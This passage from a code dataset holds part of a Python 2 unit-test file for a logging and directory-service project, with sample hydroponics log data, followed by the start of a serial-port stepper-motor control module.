bcolors.ENDC)
# Allow some time to process.
seconds_to_sleep = 5
print '%d seconds to process subprocs' % seconds_to_sleep
time.sleep(seconds_to_sleep)
# Kill both processes: collector and log generator
os.kill(proc_app.pid, signal.SIGINT)
os.kill(proc_collector.pid, signal.SIGINT)
# Set the log level to log everything == NOTSET
logging.basicConfig(level=logging.NOTSET)
# Now read the log file and make sure expected logs exist.
# The messages from logginClientTask.main() get logged.
log_fh = open(log_filename, 'r')
log_lines = log_fh.read()
# Junk messages. The output logs will be inspected for
        # the presence of these messages.
warning_msg = 'msg=Warning,a=n,stuff=yuck,floor=ceiling'
error_msg = 'status=3,warn=continue,babble=yes,reason=testing'
debug_msg = 'msg=debug,details=yes'
critical_msg = 'msg=critical,reason=meltdown'
info_msg = 'status=1,msg=info,reason=nothing important'
# FIXME TODO - make this a real unit test!
msgs = [warning_msg,
error_msg,
debug_msg,
critical_msg,
info_msg,
]
""" TODO FIXME - get a real unit test!
for msg in msgs:
print 'Testing:' + msg
self.failUnless(msg in log_lines)
"""
@fcnName
def gen_happy_path(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
Generate happy path data with payload separator
and key/value separator chars.
"""
testData = ''
testData += '2016-03-10T11:00:39.697\tDEBUG\ta=b&temp=34.5&item=Good Stuff\n'
testData += '2016-03-10T11:00:39.697\tCMD\ta=b&temp=34.5&item=Good Stuff\n'
testData += '2016-03-10T11:01:39.697\tWARNING\ta=b&temp=74.5&item=cool\n'
testData += '2016-03-10T11:01:39.697\tERROR\ta=blah&temp=999&item=cool\n'
testData += '2016-03-10T11:02:39.697\tDEBUG\ta=b&temp=82.5&item=funny\n'
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=b&temp=99.34.5&item=Stupid Stuff'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
@fcnName
def gen_missing_data(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
    Generate data with some empty values
and key/value separator chars.
"""
testData = ''
# Good line
testData += '2016-03-10T11:00:39.697\tDEBUG\ta=b&temp=&item=Good Stuff\n'
# Doubled &&
testData += '2016-03-10T11:01:39.697\tWARNING\ta=b&&item=cool\n'
# key=value=value problem(?)
testData += '2016-03-10T11:02:39.697\tDEBUG\ta=b=c&temp=82.5&item=funny\n'
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=&temp=99.34.5&item=Stupid Stuff\n'
testData += '2016-03-10T11:02:39.697\tCMD\ta=b=c&temp=82.5&item=funny\n'
# & at end of line
testData += '2016-03-10T11:03:39.697\tCRITICAL\t=b&temp=99.34.5&item=Stupid Stuff&\n'
# duplicated keyword "temp"
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=b&temp=99.34.5&temp=999.999&item=Stupid Stuff&\n'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
@fcnName
def gen_mixed_data(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
Even in our simple Raspberry Pi hydroponic system,
a bit of thought placed into logging concepts
will absolutely serve us well. Just logging
    for logging's sake does not provide an incentive
to log. Having these logs provide a usable history
and alarm system incentivises our logging structure.
Think of logging as an integral part of our SCADA system.
SCADA = Supervisory Control and Data Acquisition.
SCADA gets used in remote monitoring and control
    systems that operate with coded signals
    over communications channels.
    Wikipedia: SCADA -- https://en.wikipedia.org/wiki/SCADA
Some logs that an elementary SCADA system could generate.
The model is, once again, a hydroponics system. The
hydroponics system has 2 Raspberry Pis controlling various
devices and this logs to a desktop. The desktop may
send control commands. Various logs from both systems
get sent to the logger to monitor and track events
in these systems.
Assume "hydro1" and "hydro2" are systems in a remote
hydroponics garden with various measurement
instrumentations. This remote system logs to a
desktop inside the home.
    Commands the remote uses to start pumps and switches
    get logged as well. This uses "cmd=true&pump1=ON&host=hydro1"
meaning this is a command that turns pump1 on and
the host is hydro1.
Generate data that would look like more ordinary
data. This includes:
A named switch changing values ON/OFF.
An instrument reporting temperature reading.
A water level indicator reading too low or to high.
A moisture level too low has triggered.
A periodic report of temperature
and key/value separator chars.
Notice the keywords:
--------------------
device = Device name
state = Value for descrete devices: ON, OFF, UNKNOWN
temp = Temperature reading for analog temperature
host = Which system sent this data
cmd=req = A command request was sent. host=system performing req
cmd=req&tag=xyz...&host=central
cmd=rep = A command reply indicates acknowledgement. host=sys performing command.
A reply sends the tag of the command. Optionally the entire
original command may populate the command.
cmd=rep&tag=xyz&host=hygro1
Devices in this example:
pump01 = A water pump to maintain proper levels.
water01 = A flotation switch that detects water levels too high or too low.
tempIN, tempOUT = analog temperature measurements.
All analog and discrete devices may send "UNKNOWN" as a connection could
have dropped, power lost, wiring problems, ...
"""
testData = ''
# A periodic reading of water and temperature from several instruments
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=water01&state=OFF&host=hydro1\n'
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=tempIN&temp=72.3&host=hydro1\n'
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=tempOUT&temp=69.2&host=hydro1\n'
# Water level has gone too low
testData += '2016-03-14T08:00:07.325\tERROR\tdevice=water01&state=LOW&host=hydro1\n'
# Pump started to raise water level. A command was sent
# pump01 request to start.
testData += '2016-03-14T08:00:09.876\tINFO\tcmd=req&tag=xyz=pump01&state=ON&host=hydro1\n'
# Command started, remote sends reply. Note use of "tag"
testData += '2016-03-14T08:00:09.876\tINFO\tcmd=rep&tag=xyz&host=hydro1\n'
# Water level back to normal and turn pump1 off.
testData += '2016-03-14T08:05:05.325\tINFO\tdevice=water01&state=OK&host=hydro1\n'
# Pump turns off
testData += '2016-03-14T08:05:15.876\tINFO\tcmd=req&tag=abc&pump01=OFF&host=hydro1\n'
# Pump starting to off state.
testData += '2016-03-14T08:05:15.876\tINFO\tcmd=rep&tag=abc&host=hydro1\n'
# Periodic temperature readings
# More likely would be one reading per device.
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=water01&state=OK&pump01=OFF&temp04=70.1&temp03=69.0&host=hydro1\n'
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=pump01&device=temp04&temp=70.1&temp03=69.0&host=hydro1\n'
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=pump01&device=temp03&temp=69.0&host=hydro1\n'
#
# BROKEN - FIXME - need one device per request! "circulation" is a macro
# Normal circulation started on command. Notice multiple devices turned on.
testData += '2016-03-14T08:12:14.734\tINFO\tcmd=req&tag=circulation&water01=OK&pump01=ON&circulation=ON&host=hydro1\n'
# Circulation started
testData += '2016-03-14T08:12:14.734\tINFO\tcmd=rep&tag=circulation&&host=hydro1\n'
# Normal circulation finished. Simply status indicating state of devices.
testData += '2016-03-14T08:22:14.739\tINFO\twater01=OK&pump01=OFF&circulation=OFF&host=hydro1\n'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
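# Illustrative helper (added; not used by the tests): assembling one log payload
# that follows the keyword conventions documented in gen_mixed_data() above
# (device/state/temp/host plus cmd=req/rep with a tag). The separator characters
# come from utils so the result matches what the generators produce.
def build_example_payload(pairs,
                          sep_char=utils.PAYLOAD_CONNECTOR,
                          key_val_sep=utils.KEY_VALUE_SEPARATOR):
    """Join (key, value) pairs such as [('device', 'water01'), ('state', 'LOW'),
    ('host', 'hydro1')] into a single payload string."""
    return sep_char.join('%s%s%s' % (key, key_val_sep, value) for key, value in pairs)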
class TestLogs2CSV(unittest.TestCase):
# python -m unittest testLogging.TestLogs2CSV
@fcnName
def testHappyPath_1(self):
print 'testHappyPath'
testData = gen_happy_path()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
csv = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
csv.parse_log_entry(lines[0])
print csv.log_keys() # Sorted keys matching data
self.failUnless('date' in csv.log_dict)
self.failUnless('level' in csv.log_dict)
self.failUnless(csv.log_dict['level'] == 'DEBUG')
self.failUnless('a' in csv.log_dict)
self.failUnless(csv.log_dict['a'] == 'b')
self.failUnless('item' in csv.log_dict)
self.failUnless(csv.log_dict['item'] == 'Good Stuff')
@fcnName
def testHappyPath_Warning(self):
print 'testHappyPath_Warning'
testData = gen_happy_path()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
csv = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = csv.parse_log_entry(lines[1])
self.failUnless('date' in log_dict)
self.failUnless('level' in log_dict)
self.failUnless(log_dict['level'] == 'CMD')
self.failUnless('a' in log_dict)
self.failUnless(log_dict['a'] == 'b')
self.failUnless('item' in log_dict)
self.failUnless(log_dict['item'] == 'Good Stuff')
@fcnName
def testMissingData(self):
print 'testMissingData'
testData = gen_missing_data()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
lf = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = lf.parse_log_entry(lines[0])
self.failUnless('date' in log_dict)
self.failUnless('level' in log_dict)
self.failUnless(log_dict['level'] == 'DEBUG')
self.failUnless('a' in log_dict)
self.failUnless(log_dict['a'] == 'b')
self.failUnless('item' in log_dict)
self.failUnless(log_dict['item'] == 'Good Stuff')
@fcnName
def testMixedData(self):
print 'testMixedData'
testData = gen_mixed_data()
lines = testData.split('\n')
# select only WARNING or higher
log_filters = logFilter.LogFilters.copy() # don't zap original!
log_filters['level'] = 'WARNING'
try:
lf = logFilter.LogFilterCSV(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = lf.parse_log_entry(lines[0])
self.failUnless(log_dict is None)
log_dict = lf.parse_log_entry(lines[3])
self.failUnless(log_dict != None)
self.failUnless(log_dict['level'] == 'ERROR')
self.failUnless('date' in log_dict)
class TestISO8601(unittest.TestCase):
"""
python -m unittest testLogging.TestISO8601
Current bash date rounded to microseconds:
date +"%s.%6N"
1458149245.545454
In milliseconds:
date +%s%3N
1458149374982
Python:
import time
cur_time = int(time.time()*1000)
Ref: https://www.gnu.org/software/coreutils/manual/html_node/Examples-of-date.html
To convert a date string to the number of seconds since the start of the epoch
use the '%s" format:
date --date='1970-01-01 00:02:00 +0000' +%s
120
If you do not specify time zone information in the date string, date uses your
computer's idea of the time zone:
# local time zone used
date --date='1970-01-01 00:02:00' +%s
18120
Also the --utc (-u) option:
date --date='2000-01-01 UTC' +%s
946684800
To convert such an unwieldy number of seconds back to a more readable form, use
a command like this:
date -d @946684800 +"%F %T %z"
1999-12-31 19:00:00 -0500
Often it is better to output UTC-relative date and time:
date -u -d '1970-01-01 946684800 seconds' +"%Y-%m-%d %T %z"
2000-01-01 00:00:00 +0000
"""
@fcnName
def testUnixToISO8601_0(self):
""" From unix time to external local ISO8601 """
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
date_now = 1457967609.123456
date_time_now = datetime.datetime.fromtimestamp(date_now)
print 'date_time_now:%s' % str(date_time_now)
self.failUnless(str(date_time_now) == '2016-03-14 08:00:09.123456')
fmt = '%Y-%m-%dT%H:%M:%S.%f'
now_str = date_time_now.strftime(fmt)
print 'now_str:%s' % now_str
self.failUnless(str(now_str) == '2016-03-14T08:00:09.123456')
now_tuple = datetime.datetime.strptime(now_str, fmt)
print 'now_tuple:%s' % str(now_tuple)
self.failUnless(str(now_tuple) == '2016-03-14 08:00:09.123456')
print 'microsecond:%s' % now_tuple.microsecond
seconds = time.mktime(now_tuple.timetuple())
print 'seconds:%s' % str(seconds)
sec_epoch = time.mktime(now_tuple.timetuple()) + 1.0e-6*now_tuple.microsecond
sec_epoch = seconds + now_tuple.microsecond/1000000.0
print 'sec_epoch: %s' % sec_epoch
# date -d @1457967609.123456 +%FT%T.%N
# 2016-03-14T08:00:09.123456000
self.failUnless(sec_epoch == date_now)
@fcnName
def testUnixToISO8601_1(self):
"""
From unix time to external local ISO8601
User needs to convert internal unix floating point
seconds into an ISO 8601 string.
"""
date_str = '2016-03-14T08:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
secsNow = 1457967609.123456 # Unix time in seconds
# Convert to ISO 8601
secStr = utils.seconds_to_ISO8601(secsNow)
self.failUnless(date_str == secStr)
@fcnName
def testTimeNowISO8601(self):
"""
        Cannot really verify now() in a convenient, testable manner.
        What to do? All this routine does is increase coverage.
"""
secs_str = utils.time_now_ISO8601()
print 'time_now_ISO8601=' + secs_str
@fcnName
def testISO8601ToSecs(self):
"""
From ISO 8601 to unix seconds.
App reads DATE field from log file and converts to
internal unix floating point seconds in local time.
"""
date_str = '2016-03-14T08:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
secsNow = 1457967609.123456 # Unix time in seconds
secs = utils.ISO8601_to_seconds(date_str)
self.failUnless(secs == secsNow)
@fcnName
def testISO8601ToSecsErrors(self):
"""
From ISO 8601 to unix seconds with errors in input
App reads DATE field from log file and converts to
internal unix floating point seconds in local time.
"""
date_str = '2016-03-14T:11:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
secs = utils.ISO8601_to_seconds(date_str)
self.failUnless(secs is None)
@fcnName
def testTimeNow(self):
"""
Simple test of time now.
"""
the_time = utils.time_now()
# Ignore the value as "the_time" always changes.
self.failUnless(type(the_time) == type(1.0))
@fcnName
    def testTimeNowISO8601Type(self):
"""
Simple test of the time now in ISO8601 format
"""
iso = utils.time_now_ISO8601()
self.failUnless(type(iso) == type(''))
@fcnName
def testISOError(self):
"""
Test error conditions.
Pass in bogus ISO8601 formats. Should get None seconds
"""
seconds = utils.ISO8601_to_seconds('2016-XX-01T00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-99-01T00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T30:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01X00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:61:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00:00.abc')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00:00')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00')
self.failUnless(seconds is None)
# No leading 0's - OK
seconds = utils.ISO8601_to_seconds('2016-3-01T00:00:00.000')
self.failUnless(seconds != None)
# No leading 0's - OK
seconds = utils.ISO8601_to_seconds('2016-3-1T0:0:0.0')
self.failUnless(seconds != None)
class TestLogs2JSON(unittest.TestCase):
# python -m unittest testLogging.TestLogs2JSON
@fcnName
def testLogs2JSON_HappyPath(self):
print '\ntestLogs2JSON_HappyPath'
testData = gen_happy_path()
#print 'testData:\n' + testData
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
try:
lf = logFilter.LogFilterJSON({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
json_data = lf.log_file_2_JSON(f.name)
f.close()
# Pretty print json
py_internal = json.loads(json_data)
#print json.dumps(py_internal, sort_keys=True, indent=4,
# separators=(',', ':'))
self.failUnless(py_internal[0]['level'] == 'DEBUG')
self.failUnless(py_internal[0]['temp'] == '34.5')
self.failUnless(py_internal[1]['level'] == 'CMD')
self.failUnless(py_internal[1]['temp'] == '34.5')
self.failUnless(py_internal[1]['item'] == 'Good Stuff')
@fcnName
def testLogs2JSON_Mixed(self):
print '\ntestLogs2JSON_Missing'
testData = gen_mixed_data()
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
# Filter out to WARNING and above.
log_filters = logFilter.LogFilters.copy()
log_filters['level'] = 'WARNING'
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
json_data = lf.log_file_2_JSON(f.name)
f.close()
# Pretty print json
json_internal = json.loads(json_data)
"""
print json.dumps(json_internal, sort_keys=True, indent=4,
separators=(',', ':'))
"""
self.failUnless(json_internal[0]['level'] == 'ERROR')
self.failUnless(json_internal[0]['device'] == 'water01')
self.failUnless(json_internal[0]['state'] == 'LOW')
@fcnName
def testLogs2JSON_Bogus_filename(self):
print '\ntestLogs2JSON_Bogus_filename'
log_filters = logFilter.LogFilters.copy()
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
result = lf.log_file_2_JSON('/QQQ/ZZZ.bogus')
self.failUnless(result is None)
@fcnName
def countKeyValueJSON(json_struct, key, value):
"""
Count the number of keys with specified value in json_struct.
"""
count = 0
for item in json_struct:
if key in item:
if item[key] == value:
count += 1
return count
class TestLogLevelsPriorities(unittest.TestCase):
# python -m unittest testLogging.TestLogLevelsPriorities
@fcnName
def testCycles(self):
"""Test the cycle priority changes."""
new_level = cycle_priority('DEBUG')
self.failUnless(new_level == 'INFO')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'WARNING')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'CMD')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'ERROR')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'CRITICAL')
new_level = cycle_priority(new_level)
self.failUnless(new_level == 'DEBUG')
# Garbage level name results in DEBUG
new_level = cycle_priority('FOO_BAR')
self.failUnless(new_level == 'DEBUG')
# Garbage level name results in DEBUG
@fcnName
def testDebugLevel(self):
debug_dict = utils.filter_priority('DEBUG')
self.failUnless('DEBUG' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testWarningLevel(self):
debug_dict = utils.filter_priority('WARNING')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('WARNING' in debug_dict)
self.failUnless('ERROR' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testERRORLevel_0(self):
debug_dict = utils.filter_priority('ERROR')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('INFO' not in debug_dict)
self.failUnless('WARNING' not in debug_dict)
self.failUnless('ERROR' in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testCRITICALLevel_0(self):
debug_dict = utils.filter_priority('CRITICAL')
self.failUnless('DEBUG' not in debug_dict)
self.failUnless('INFO' not in debug_dict)
self.failUnless('WARNING' not in debug_dict)
self.failUnless('ERROR' not in debug_dict)
self.failUnless('CRITICAL' in debug_dict)
@fcnName
def testErrorLevelJSON_1(self):
print '\ntestErrorLevelJSON - filter to >= ERROR'
testData = gen_happy_path()
        testData += gen_missing_data()
f = tempfile.NamedTemporaryFile(delete=True)
f.write(testData)
f.flush()
log_filters = logFilter.LogFilters.copy()
log_filters['level'] = 'ERROR'
try:
lf = logFilter.LogFilterJSON(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return
json_data = lf.log_file_2_JSON(f.name)
f.close()
json_internal = json.loads(json_data)
"""
# Pretty print json
print json.dumps(json_internal, sort_keys=True, indent=4,
separators=(',', ':'))
"""
num_debug = countKeyValueJSON(json_internal, 'level', 'DEBUG')
self.failUnless(num_debug == 0)
num_info = countKeyValueJSON(json_internal, 'level', 'INFO')
self.failUnless(num_info == 0)
num_warnings = countKeyValueJSON(json_internal, 'level', 'WARNING')
self.failUnless(num_warnings == 0)
num_error = countKeyValueJSON(json_internal, 'level', 'ERROR')
self.failUnless(num_error > 0)
num_critical = countKeyValueJSON(json_internal, 'level', 'CRITICAL')
self.failUnless(num_critical > 0)
self.failUnless(json_internal[0]['level'] == 'ERROR')
self.failUnless(json_internal[0]['temp'] == '999')
@fcnName
def testCRITICALLevel_BogusLevel(self):
"""Test an invalid logging level"""
bogusDict = utils.filter_priority('BOGUS')
self.failUnless(bogusDict == utils.LOG_LEVELS.keys())
class TestDirectoryService(unittest.TestCase):
"""
Test the various functions of a directory
service.
"""
# python -m unittest testLogging.TestDirectoryService
# Use standard ports to allow test to
# proceed without worrying about existing
# logCollectors or directory services..
LOG_PORT = logConfig.get_logging_port()
log_collector = None # Process for log collector
logConfig.DIR_PORT = logConfig.get_directory_port()
DIR_SVC_PORT = logConfig.get_directory_port()
dir_svc = None # Process for directory services
# True if logCollector was started, else False
LOG_COLLECTOR_STARTED = False
# True if directory services already runing, else False
DIRECTORY_SERVICE_STARTED = False
@fcnName
def setUp(self):
"""
Start logCollector and dirSvc only it they are not
currently running.
"""
# Setup log collector object
# TBD: Does this track changing ports? TODO BUG?
self.log_client = loggingClientTask.LoggingClientClass(platform.node())
self.log_client.start()
log_entry = 'Starting=TestDirectoryService,log_port=%d' % \
TestDirectoryService.LOG_PORT
self.log_client.info(log_entry)
if listeningPort.is_listening(TestDirectoryService.LOG_PORT):
sys.stdout.write('logCollector already running.\n')
else:
sys.stdout.write('--- TestDirectoryService: setUp() port %s\n' %
TestDirectoryService.LOG_PORT)
self.StartLogServer()
sys.stdout.write('--- TestDirectoryService: logCollector setUp()\n')
time.sleep(1)
if listeningPort.is_listening(TestDirectoryService.DIR_SVC_PORT):
sys.stdout.write('dirSvc already running.\n')
else:
sys.stdout.write('--- TestDirectoryService: dirSvc setUp() port %s\n' %
TestDirectoryService.DIR_SVC_PORT)
self.StartDirService()
sys.stdout.write('--- setUp() finished.\n')
time.sleep(1)
self.testDirClient = dirClient.DirClient(in_config={
'clear': True,
'memory_filename': './dirSvc.data',
'port': str(logConfig.DIR_PORT),
'noisy': True,
})
@fcnName
def tearDown(self):
sys.stdout.write('--- Kill the dirSvc before the logCollector. ---\n')
        sys.stdout.write('--- TestDirectoryService: dirSvc tearDown()\n')
        self.KillDirService()
        sys.stdout.write('--- TestDirectoryService: logCollector tearDown()\n')
self.KillLogServer()
@fcnName
def StartLogServer(self):
"""
Spawn the log server in their own
separate procsses.
"""
log_port = TestDirectoryService.LOG_PORT
print '------ LOG Collector starting ------'
abs_log_collector = os.path.abspath(logCollector.__file__)
log_filename = os.path.abspath('./logs.log')
print 'log_filename:%s' % log_filename
# Remove existing log file
# Other tests will test for append mode.
if os.path.exists(log_filename) and \
os.path.isfile(log_filename):
os.remove(log_filename)
log_port = TestDirectoryService.LOG_PORT
args = ['python',
abs_log_collector,
'--noisy', # Echo logs to console
'--port=%s' % str(log_port),
'--log-file=%s' % log_filename,
]
print 'starting logCollector:%s' % ' '.join(args)
argv_collector = args
TestDirectoryService.log_collector = subprocess.Popen(argv_collector)
print ' '.join(argv_collector)
print (bcolors.BGGREEN +
('log_collector pid: %d' %
TestDirectoryService.log_collector.pid) +
bcolors.ENDC)
TestDirectoryService.LOG_COLLECTOR_STARTED = True
@fcnName
def StartDirService(self):
"""
Start the directory service. If already
running, ignore this request.
"""
dir_svc_port = TestDirectoryService.DIR_SVC_PORT
print '------ Directory Service starting ------'
abs_dir_service = os.path.abspath(dirSvc.__file__)
argv_client = ['python',
abs_dir_service,
'--port=%s' % str(dir_svc_port),
'--memory-file=%s' % './logsDirSvc.log',
'--clear', # Wipe out old data
]
print 'starting dirSvc:' + ' '.join(argv_client)
TestDirectoryService.dir_svc = subprocess.Popen(argv_client,
stderr=subprocess.STDOUT)
print (bcolors.BGGREEN +
('dirSvc pid: %d' % TestDirectoryService.dir_svc.pid) +
bcolors.ENDC)
# Allow some time to process.
seconds_to_sleep = 2
print '%d seconds to process subprocs' % seconds_to_sleep
time.sleep(seconds_to_sleep)
TestDirectoryService.DIRECTORY_SERVICE_STARTED = True
@fcnName
def KillLogServer(self):
"""
Kill the log collector only if the process
was not started by this process.
"""
if TestDirectoryService.LOG_COLLECTOR_STARTED:
print 'killing logCollector at pid %d' % \
TestDirectoryService.log_collector.pid
#os.kill(TestDirectoryService.log_collector.pid, signal.SIGKILL)
self.log_client.info('@EXIT')
time.sleep(1)
else:
print 'Not killing pre-existing logCollector'
@fcnName
def KillDirService(self):
"""
Kill the directory service only if the process
was not started by this process.
"""
if TestDirectoryService.DIRECTORY_SERVICE_STARTED:
print 'killing dirSvc at pid %d' % \
TestDirectoryService.dir_svc.pid
self.testDirClient.port_request('@EXIT')
else:
print 'Not killing pre-existing dirSvc'
@fcnName
def testDirSvc_0(self):
print '---- TestDirectoryService.testDirSvc_0 - starting'
dir_svc = TestDirectoryService.dir_svc
log_col = TestDirectoryService.log_collector
try:
# Clear the directory
print '%s' % self.testDirClient.port_request('@CLEAR')
print 'dirNameBasePort: %s' % logConfig.getDirNameBasePort()
# Add a few names to the directory
req0 = self.testDirClient.port_request('testDirSvc')
req1 = self.testDirClient.port_request('abc')
req2 = self.testDirClient.port_request('xyz')
print 'abc req1=%s' % str(req1)
print 'abc port_request(abc)=%s' % str(self.testDirClient.port_request('abc'))
print '%s' % self.testDirClient.port_request('@DIR')
req1_again = self.testDirClient.port_request('abc')
self.failUnless(req1 == req1_again)
# Delete name abc
print '~abc ' + self.testDirClient.port_request('~abc')
print 'after ~abc @DIR: %s' % self.testDirClient.port_request('@DIR')
# Since 'abc' was deleted, a request yields a new port
self.failUnless(req1 != self.testDirClient.port_request('abc'))
except Exception as err:
sys.stderr.write(str(err) + '\n')
traceback.print_stack()
print '-----------'
traceback.print_exc()
if __name__ == '__main__':
# Standard way to initialize for logging
apiLoggerInit.loggerInit()
#ch = logging.StreamHandler(sys.stdout)
#log = logging.getLogger('')
#log.addHandler(ch)
logging.info('Unit test started')
#suite = unittest.TestLoader().loadTestsFromTestCase(RunTests)
#unittest.TextTestRunner(verbosity=2).run(suite)
unittest.main()
| TrailingDots/async_py_messaging | async_py_messaging/test/testLogging.py | Python | gpl-3.0 | 35,340 |
from numpy import int_
from platform import system
import serial, time, glob
import sys
def disp_ports():
print "Found ports:"
for name in list_serial_ports(): print name
def list_serial_ports():
if system() == 'Windows':
# Scan for avilable ports
available = []
for ix in range(256):
try:
s = serial.Serial(ix)
available.append((ix, s.portstr))
s.close()
except serial.SerialException:
pass
return available
elif system() == 'Darwin': # Mac
        return glob.glob('/dev/tty*') + glob.glob('/dev/cu*')
elif system() == 'Linux':
        return glob.glob('/dev/ttyS*') + glob.glob('/dev/ttyUSB*')
def reply_bytes_to_data(rpl_bytes):
rpl_data = 256**3 * rpl_bytes[5] + 256**2 * \
rpl_bytes[4] + 256 * rpl_bytes[3] + rpl_bytes[2]
if rpl_bytes[5] > 127:
rpl_data = rpl_data - 256**4 # Handles negative data
return(rpl_data )
def send( inst, ser ):
# send instruction
# inst must be a list of 6 bytes (no error checking)
for i in range (6):
ser.write(chr(inst[i]))
return
def receive(ser):
# return 6 bytes from the receive buffer
# there must be 6 bytes to receive (no error checking)
nbytes = 6
r = [0]*nbytes
for i in range(nbytes):
r[i] = ord(ser.read(1))
return r
def motor_specs(model = 'NM17C12S-MC6'):
m_specs = {}
if model == 'NM17C12S-MC6':
m_specs['microstep_sz'] = 0.028125 # Default resolution, degrees
m_specs['max_speed'] = 7910 # Degree/s
m_specs['min_speed'] = 0.1318 # Degree/s
m_specs['speed_resolution'] = 0.1318 # Degree/s
m_specs['motor_steps_per_rev'] = 200
else:
print 'Data for the model is lacking'
return m_specs
def stage_specs():
"""
Specifications for individual xy-stages
"""
# TODO: make better
s_specs = {'um_per_turn': 2000.0/3}
return s_specs
def microns_to_microsteps(um, model='NM17C12S-MC6'):
"""
Parameters
----------
um - microns
model - model of motor connected to T-MCA
Returns
-------
n_microsteps - number of microsteps to move um microns
"""
# Full turn: 2000.0/3 um
# step: 100 um -> 100 / (2000.0/3) turns (approx 0.15)
# step in degrees: 0.15 * 360
# in microsteps: 0.15 * 360 / m_specs['microstep_sz']
s_specs = stage_specs()
m_specs = motor_specs(model)
n_microsteps = int_(round((um/s_specs['um_per_turn']*360) /
m_specs['microstep_sz']))
return n_microsteps
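# Worked example (added for illustration): with the NM17C12S-MC6 defaults above,
# microns_to_microsteps(100) is 100 / (2000.0/3) = 0.15 turns, i.e. 54 degrees,
# and 54 / 0.028125 = 1920 microsteps.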
def experiment_default_settings(ser, model='NM17C12S-MC6', verbose=True):
m_specs = motor_specs(model)
target_speed = 2.0 # Degree/s
target_speed_bytes = cmd_data_to_bytes(
int_(round(target_speed * 1.6384 / m_specs['microstep_sz'])))
if verbose:
print 'Target speed is set to: ', target_speed, 'degree/s.'
print 'The command bytes are: ', target_speed_bytes
instruction = [1, 42]
instruction.extend(target_speed_bytes)
if verbose:
print instruction
send(instruction, ser)
instruction[0] = 2
if verbose:
print instruction
send(instruction, ser)
acceleration = 100 # Degree/s
acc_bytes = cmd_data_to_bytes(
int_(round(acceleration/(10000/1.6384*m_specs['microstep_sz']))))
if verbose:
        print 'Acceleration is set to: ', acceleration, 'degree/s^2.'
print 'The command bytes are: ', acc_bytes
instruction = [1, 43]
instruction.extend(acc_bytes)
if verbose:
print instruction
send(instruction, ser)
instruction[0] = 2
if verbose:
print instruction
send(instruction, ser)
# TODO: set max relative move, cmd 46
def cmd_data_to_bytes(cmd_data):
cmd_bytes = [0, 0, 0, 0]
if cmd_data < 0: # Handles negative data
cmd_data = 256**4 + cmd_data
cmd_bytes[3] = cmd_data / 256**3
cmd_data = cmd_data - 256**3 * cmd_bytes[3]
cmd_bytes[2] = cmd_data / 256**2
cmd_data = cmd_data - 256**2 * cmd_bytes[2]
cmd_bytes[1] = cmd_data / 256
cmd_data = cmd_data - 256 * cmd_bytes[1]
cmd_bytes[0] = cmd_data
